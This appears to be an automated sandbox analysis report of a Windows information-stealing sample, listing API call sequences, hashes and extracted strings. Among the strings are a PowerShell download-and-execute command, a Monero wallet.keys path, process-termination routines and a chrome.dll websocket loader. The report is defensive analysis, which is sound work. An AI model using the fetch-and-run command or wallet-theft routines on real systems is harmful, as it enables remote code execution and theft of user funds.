                                 • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: ebb3b52c405ef4791c0ef42905e707b64a3915d48c1932ffd74f0b0d79284f9a
                                • Instruction ID: 47d8f326fb438a754591634f99e0240617c1cbdd590d6b0723c911d164e8f950
                                • Opcode Fuzzy Hash: ebb3b52c405ef4791c0ef42905e707b64a3915d48c1932ffd74f0b0d79284f9a
                                • Instruction Fuzzy Hash: 4631F6B5A40218ABDB24CF54DC89BDDB7B5AB48304F1081E8FA09B7381D7706EC58F98
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01BFEF38,00000000,?,00EC0E14,00000000,?,00000000), ref: 00EB82C0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB82C7
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00EB82E8
                                • wsprintfA.USER32 ref: 00EB833C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2922868504-3474575989
                                • Opcode ID: 99e3a7b626ca632431708ccd5630dd6b92944852b13d37747b1285a638dbabdf
                                • Instruction ID: a9658fac023732233bb7c9a437ebbd9dba129b560cd29dfe8c0554988207a018
                                • Opcode Fuzzy Hash: 99e3a7b626ca632431708ccd5630dd6b92944852b13d37747b1285a638dbabdf
                                • Instruction Fuzzy Hash: C721F4B1E44208ABDB14DFD4CD4AFAFB7B8EB44B14F104629F615BB280D77869008BA5
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EB85B6
                                • wsprintfA.USER32 ref: 00EB85E9
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EB860B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB861C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB8629
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                • RegQueryValueExA.ADVAPI32(00000000,01BFEE00,00000000,000F003F,?,00000400), ref: 00EB867C
                                • lstrlen.KERNEL32(?), ref: 00EB8691
                                • RegQueryValueExA.ADVAPI32(00000000,01BFEF08,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00EC0B3C), ref: 00EB8729
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB8798
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB87AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 9e4e4c81629156b3c7a5f40dcef8006a0d207a66e147580d7d444a127e74245c
                                • Instruction ID: 61aa69f3faaef599ce755ea19ad5a5e70c5850cfb9daf182c5fa80f009a7ed72
                                • Opcode Fuzzy Hash: 9e4e4c81629156b3c7a5f40dcef8006a0d207a66e147580d7d444a127e74245c
                                • Instruction Fuzzy Hash: 8B21EB7191021CABDB24DB54DD85FE9B3B8FB48704F1081E9E619A6280DF716AC5CFE4
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EB99C5
                                • Process32First.KERNEL32(00EAA056,00000128), ref: 00EB99D9
                                • Process32Next.KERNEL32(00EAA056,00000128), ref: 00EB99F2
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EB9A4E
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EB9A6C
                                • CloseHandle.KERNEL32(00000000), ref: 00EB9A79
                                • CloseHandle.KERNEL32(00EAA056), ref: 00EB9A88
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 2696918072-0
                                • Opcode ID: 1f5a502337edfacfc45b9c273aaf16d5b7cbb73a394f78b7eddae119ce7ac274
                                • Instruction ID: 745b5d2820008c7b003214bc1ef252d1edf831e00ed48431bde5435c1989cb67
                                • Opcode Fuzzy Hash: 1f5a502337edfacfc45b9c273aaf16d5b7cbb73a394f78b7eddae119ce7ac274
                                • Instruction Fuzzy Hash: C821FC75900218EBDB35DFA1D888BEEB7B9BB48304F1041D8E619A6284D7749EC4CF90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7834
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB783B
                                • RegOpenKeyExA.ADVAPI32(80000002,01BECE80,00000000,00020119,00000000), ref: 00EB786D
                                • RegQueryValueExA.ADVAPI32(00000000,01BFEE90,00000000,00000000,?,000000FF), ref: 00EB788E
                                • RegCloseKey.ADVAPI32(00000000), ref: 00EB7898
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: e004b7c629892ee2a400bbf788070d75f30de4764c68100f0d735da45bb93cdb
                                • Instruction ID: 97b034a49a34b99381c1a5e08c717ed4d5ec211be97a7f6c7b1c3ba25cc61397
                                • Opcode Fuzzy Hash: e004b7c629892ee2a400bbf788070d75f30de4764c68100f0d735da45bb93cdb
                                • Instruction Fuzzy Hash: D701F475A44305BBE718DBE4DD4DFAE7779EB84700F104068FA55A6784D6709940CB50
                                APIs
                                • CreateFileA.KERNEL32(>=,80000000,00000003,00000000,00000003,00000080,00000000,?,00EB3D3E,?), ref: 00EB948C
                                • GetFileSizeEx.KERNEL32(000000FF,>=), ref: 00EB94A9
                                • CloseHandle.KERNEL32(000000FF), ref: 00EB94B7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: >=$>=
                                • API String ID: 1378416451-3543398223
                                • Opcode ID: 71a5d7e43b508f6c52890958a6b1929ddb6382b50cef5aa4f4a3eebe5962695f
                                • Instruction ID: de4444a034c0883e74c6fcafbdf8f679e87e7dc8433da0401197ca20216890a1
                                • Opcode Fuzzy Hash: 71a5d7e43b508f6c52890958a6b1929ddb6382b50cef5aa4f4a3eebe5962695f
                                • Instruction Fuzzy Hash: C0F04935E04208BBD714DFB0EC49F9F77B5AB48714F10C554F621B72C4D67096418B40
                                APIs
                                • memset.MSVCRT ref: 00EB4325
                                • RegOpenKeyExA.ADVAPI32(80000001,01BFE720,00000000,00020119,?), ref: 00EB4344
                                • RegQueryValueExA.ADVAPI32(?,01BFF1A8,00000000,00000000,00000000,000000FF), ref: 00EB4368
                                • RegCloseKey.ADVAPI32(?), ref: 00EB4372
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB4397
                                • lstrcat.KERNEL32(?,01BFF1C0), ref: 00EB43AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: a2e60e07681e9d01358ff4908d09b5f573ffb4b447c1f56bb7fd5d6496c4bdf6
                                • Instruction ID: b1098094b0e7fecc8ffb3dfe7ee34500d799330c56466c0b1bb6f2994f1801fe
                                • Opcode Fuzzy Hash: a2e60e07681e9d01358ff4908d09b5f573ffb4b447c1f56bb7fd5d6496c4bdf6
                                • Instruction Fuzzy Hash: 654178B6D001086BDB28FBA0EC46FEE737DAB48700F004968B72556185EE7556C8CBE1
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                • ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                • LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                • CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                APIs
                                • lstrcat.KERNEL32(?,01BFF130), ref: 00EB4A2B
                                  • Part of subcall function 00EB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EB8F9B
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB4A51
                                • lstrcat.KERNEL32(?,?), ref: 00EB4A70
                                • lstrcat.KERNEL32(?,?), ref: 00EB4A84
                                • lstrcat.KERNEL32(?,01BEC6F8), ref: 00EB4A97
                                • lstrcat.KERNEL32(?,?), ref: 00EB4AAB
                                • lstrcat.KERNEL32(?,01BFE660), ref: 00EB4ABF
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EB8F20: GetFileAttributesA.KERNEL32(00000000,?,00EA1B94,?,?,00EC577C,?,?,00EC0E22), ref: 00EB8F2F
                                  • Part of subcall function 00EB47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EB47D0
                                  • Part of subcall function 00EB47C0: RtlAllocateHeap.NTDLL(00000000), ref: 00EB47D7
                                  • Part of subcall function 00EB47C0: wsprintfA.USER32 ref: 00EB47F6
                                  • Part of subcall function 00EB47C0: FindFirstFileA.KERNEL32(?,?), ref: 00EB480D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00EB2FD5
                                Strings
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00EB2F14
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00EB2F54
                                • <, xrefs: 00EB2F89
                                • ')", xrefs: 00EB2F03
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Similarity
                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                • String ID:
                                • API String ID: 3136044242-0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7FC7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7FCE
                                • RegOpenKeyExA.ADVAPI32(80000002,01BED430,00000000,00020119,?), ref: 00EB7FEE
                                • RegQueryValueExA.ADVAPI32(?,01BFE6C0,00000000,00000000,000000FF,000000FF), ref: 00EB800F
                                • RegCloseKey.ADVAPI32(?), ref: 00EB8022
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                APIs
                                • StrStrA.SHLWAPI(01BFEE60,00000000,00000000,?,00EA9F71,00000000,01BFEE60,00000000), ref: 00EB93FC
                                • lstrcpyn.KERNEL32(01177580,01BFEE60,01BFEE60,?,00EA9F71,00000000,01BFEE60), ref: 00EB9420
                                • lstrlen.KERNEL32(00000000,?,00EA9F71,00000000,01BFEE60), ref: 00EB9437
                                • wsprintfA.USER32 ref: 00EB9457
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EA12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EA12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EA12F5
                                • RegCloseKey.ADVAPI32(?), ref: 00EA12FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00EB6903
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00EB69C6
                                • ExitProcess.KERNEL32 ref: 00EB69F5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: 5cb490017541fb785a86d6aec0756a9512c5f0f8a553616f6c7905f8febe817c
                                • Instruction ID: 742569796b18ed0470955bcf606da2d843b8c6bb4fe10fa1d81abbfc4fa15dca
                                • Opcode Fuzzy Hash: 5cb490017541fb785a86d6aec0756a9512c5f0f8a553616f6c7905f8febe817c
                                • Instruction Fuzzy Hash: 19310CB1901118AADB18EFA0DD96FDEBBB8AF04300F4451A9F21576281DF706A88CF65
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EC0E10,00000000,?), ref: 00EB89BF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB89C6
                                • wsprintfA.USER32 ref: 00EB89E0
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 9ab5c429fbefd055df3ec9de96fa431e2391832fd5c5ce3bb845412b8d56bf9e
                                • Instruction ID: ab98d28d97a94fa5f36543f4e5148b9864a6a603ff0f5d02303afe6b876a9cf1
                                • Opcode Fuzzy Hash: 9ab5c429fbefd055df3ec9de96fa431e2391832fd5c5ce3bb845412b8d56bf9e
                                • Instruction Fuzzy Hash: CD2108B1A44208AFDB14DF94DD49FAEBBB8FB49710F104529FA25A73C4C775A940CBA0
                                APIs
                                • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00EAA098
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                • API String ID: 1029625771-1545816527
                                • Opcode ID: af5bd6705a4e48dadcb4dd0faa9834d0b017072ae59ae25a757f77ea610191ee
                                • Instruction ID: cff379deb7cc96155dc78918ed44f495f38e06b025a2433d8b33380a48aebf15
                                • Opcode Fuzzy Hash: af5bd6705a4e48dadcb4dd0faa9834d0b017072ae59ae25a757f77ea610191ee
                                • Instruction Fuzzy Hash: 41F09078645304AFC73BAB60E94CB6632B4E34B304F112538F025AB3C4C7B5A9C4CB52
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EB96AE,00000000), ref: 00EB8EEB
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB8EF2
                                • wsprintfW.USER32 ref: 00EB8F08
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: 2c4737adc07a3067f3d997d8b899d48e4a30d15bb409cea210c5ef0ca1718ef9
                                • Instruction ID: 7c496cf518ee3eabcebc58ff30cc03ec571e179bf354eb95c5668563e89cd1ef
                                • Opcode Fuzzy Hash: 2c4737adc07a3067f3d997d8b899d48e4a30d15bb409cea210c5ef0ca1718ef9
                                • Instruction Fuzzy Hash: B5E0EC75A44309FBDB28DBD4ED0EE6D77B8EB05701F0041A4FD1997380DA719E509B91
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EAAA11
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00EAAB2F
                                • lstrlen.KERNEL32(00000000), ref: 00EAADEC
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                • DeleteFileA.KERNEL32(00000000), ref: 00EAAE73
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 0c3265e1d01ecc163221457dbeddb53b036c6c3f831574ec4917229bb6d4521d
                                • Instruction ID: 1f2ea7184bbd323a691f4bb6a8b6ffd72987e33e74a55ea1109c644bc14a9bd9
                                • Opcode Fuzzy Hash: 0c3265e1d01ecc163221457dbeddb53b036c6c3f831574ec4917229bb6d4521d
                                • Instruction Fuzzy Hash: 76E1E172910108ABCF15FBA4DDA2EEF7379AF14300F5495B9F12676191EF306A48CB62
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EAD581
                                • lstrlen.KERNEL32(00000000), ref: 00EAD798
                                • lstrlen.KERNEL32(00000000), ref: 00EAD7AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00EAD82B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 8a2ae259f9088c77342fcfeff1e52ebcbcddfa8d80c412a57350231d19fec04b
                                • Instruction ID: 8a481c6e8b510d50d214599e5a63919f34ad3d3ccfa64d6c85165705fe20d24a
                                • Opcode Fuzzy Hash: 8a2ae259f9088c77342fcfeff1e52ebcbcddfa8d80c412a57350231d19fec04b
                                • Instruction Fuzzy Hash: DC910F72910108ABCF18FBA4DDA6EEF73B9AF14300F545579F12676191EF306A48CB62
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EAD901
                                • lstrlen.KERNEL32(00000000), ref: 00EADA9F
                                • lstrlen.KERNEL32(00000000), ref: 00EADAB3
                                • DeleteFileA.KERNEL32(00000000), ref: 00EADB32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 58df11aafa4e3bea6a8ef5079e44306309b1f2bee65b05bb3128377ed8a8450f
                                • Instruction ID: 95b3da9714cbc363a0a4a0730d729eee919c1e072f3f71072cb2c8f346d81026
                                • Opcode Fuzzy Hash: 58df11aafa4e3bea6a8ef5079e44306309b1f2bee65b05bb3128377ed8a8450f
                                • Instruction Fuzzy Hash: 3F81FE72920108ABCF18FBA4DDA6EEF73B9AF14300F445578F11676191EF306A48CB62
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AdjustPointer
                                • String ID:
                                • API String ID: 1740715915-0
                                • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                • Instruction ID: c03b811457129bc2238d03bf924130ca189b16d6775d1013b04de404c2aa71eb
                                • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                • Instruction Fuzzy Hash: BB51D073900216AFEB29CF14D841BFA77A5FF41320F24422DE81686592EB75ED85FB90
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EAA664
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                 • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
